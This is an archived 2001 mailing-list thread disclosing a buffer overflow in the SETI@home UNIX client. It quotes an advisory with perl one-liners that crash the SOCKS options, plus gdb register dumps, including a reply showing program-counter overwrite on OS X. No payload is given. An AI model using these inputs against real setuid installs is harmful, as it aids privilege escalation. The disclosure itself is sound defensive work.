Re: Vulnerability in SETI@home

From: dotslash@snosoft.com
Date: 12/02/01 

Date: Sat, 1 Dec 2001 23:33:49 -0800
To: joetesta@hushmail.com
From: dotslash@snosoft.com

Also on joes post he did not show an eip overwrite but on OSX we are
able to overwrite the pc register.
Starting program: /Users/elguapo/./setiathome-3.03.powerpc-
apple.1/setiathome -socks_user `perl -e 'print "A" x 9000'`
[Switching to thread 1 (process 612 thread 0x1907)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x41414140 in ?? ()
(gdb) i r
r0 0x278c 10124
r1 0xbfffd670 3221214832
r2 0x3021c 197148
r3 0x16250 90704
r4 0x201 513
r5 0x1a4 420
r6 0x400 1024
r7 0x2e 46
r8 0x170 368
r9 0x3 3
r10 0x53 83
r11 0x2cbc4 183236
r12 0x41414141 1094795585
r13 0x0 0
r14 0x0 0
r15 0x0 0
r16 0x0 0
r17 0x0 0
r18 0x0 0
r19 0x0 0
r20 0x0 0
r21 0x3 3
r22 0x0 0
r23 0x1 1
r24 0xffffffff 4294967295
r25 0x0 0
r26 0x0 0
r27 0x1 1
r28 0xbfffd7e0 3221215200
r29 0x0 0
r30 0x0 0
r31 0x2774 10100
pc 0x41414140 1094795584
ps 0x4000f030 1073803312
cr 0x22000284 570425988
lr 0x278c 10124
ctr 0x41414141 1094795585
xer 0x20 32
mq 0x0 0
fpscr 0x0 0
vrsave 0x0 0

-KF
On Sunday, December 2, 2001, at 03:15 PM, joetesta@hushmail.com wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Vulnerability in SETI@home
>
>
>
> Overview
>
> SETI@home (http://setiathome.berkeley.edu/) is a distributed project
> that
> allows ordinary citizens participate in the search for extraterrestrial
> intelligence using their computer's idle time. A buffer overflow exists
> in the UNIX client software.
>
> NOTE: this vulnerability is NOT exploitable in the default
> installation.
>
>
>
> Details
>
> The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
> possibly others) is vulnerable to buffer overflow. Example:
>
>
> # ./setiathome -version
> SETI@home client.
> Platform: i386-pc-linux-gnu-gnulibc2.1
> Version: 3.03
>
> ...
> ...
>
> # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
> Segmentation fault
> # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
> Segmentation fault
> # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
> Segmentation fault
> #
>
> [root@seti /home/setiathome]# gdb setiathome
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and
> you are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
> Starting program: /home/setiathome/setiathome -socks_server `perl -e
> 'print "A" x 5604;'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x2ab4d409 in strcpy () from /lib/libc.so.6
> (gdb) info registers
> eax 0x0 0
> ecx 0x40404040 1077952576
> edx 0x41414141 1094795585
> ebx 0xfefefeff -16843009
> esp 0x7fffe664 0x7fffe664
> ebp 0x7fffe6bc 0x7fffe6bc
> esi 0x7ffffe28 2147483176
> edi 0x807bffd 134725629
> eip 0x2ab4d409 0x2ab4d409
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> fctrl 0x37f 895
> fstat 0x0 0
> ftag 0xffff 65535
> fiseg 0x0 0
> fioff 0x0 0
> foseg 0x0 0
> fooff 0x0 0
> fop 0x0 0
>
>
>
> Solution
>
> The SETI@home UNIX client is not installed with a setuid bit by default.
> If one was added to it -- perhaps to run it under a 'setiathome'
> account --
> remove it immediately.
>
>
>
> Vendor Status
>
> The project directory, Dr. Dave P. Anderson, was contacted via
> <davea@ssl.berkeley.edu> on Monday, Nov 5th. He promptly replied that
> this problem will be fixed in the next release.
>
>
>
>
> - Joe Testa
>
> e-mail: joetesta@hushmail.com
> web page: http://hogs.rit.edu/~joet/
> AIM: LordSpankatron
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
> AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
> =M4UW
> -----END PGP SIGNATURE-----
>
>

Relevant Pages

  • Re: [RFC] [Crash-utility] Patch to use gdbs bt in crash - works great with kgdb! - KGDB
    ... understand why you wouldn't want to simply use gdb alone ... Note that this register image is in a different order than ... +enum dwarf_form ...
    (Linux-Kernel)
  • [UNIX] Progress Database Local Buffer Overflow
    ... # gdb /usr/dlc/bin/_mpros core ... Segmentation fault. ... Reading symbols from /lib/libm.so.6...done. ... There is absolutely no warranty for GDB. ...
    (Securiteam)
  • Re: am i right
    ... But the OS did not load the symbol table (only gdb ... Programmers frequently complained that the optimizer was buggy when it ... This happens when automatic register allocation is done, ... Say you put a breakpoint in a function and the function body is ...
    (comp.os.linux.setup)
  • Re: am i right
    ... But the OS did not load the symbol table (only gdb ... Programmers frequently complained that the optimizer was buggy when it ... This happens when automatic register allocation is done, ... Say you put a breakpoint in a function and the function body is ...
    (comp.os.linux.misc)
  • Re: am i right
    ... But the OS did not load the symbol table (only gdb ... Programmers frequently complained that the optimizer was buggy when it ... This happens when automatic register allocation is done, ... Say you put a breakpoint in a function and the function body is ...
    (comp.os.linux)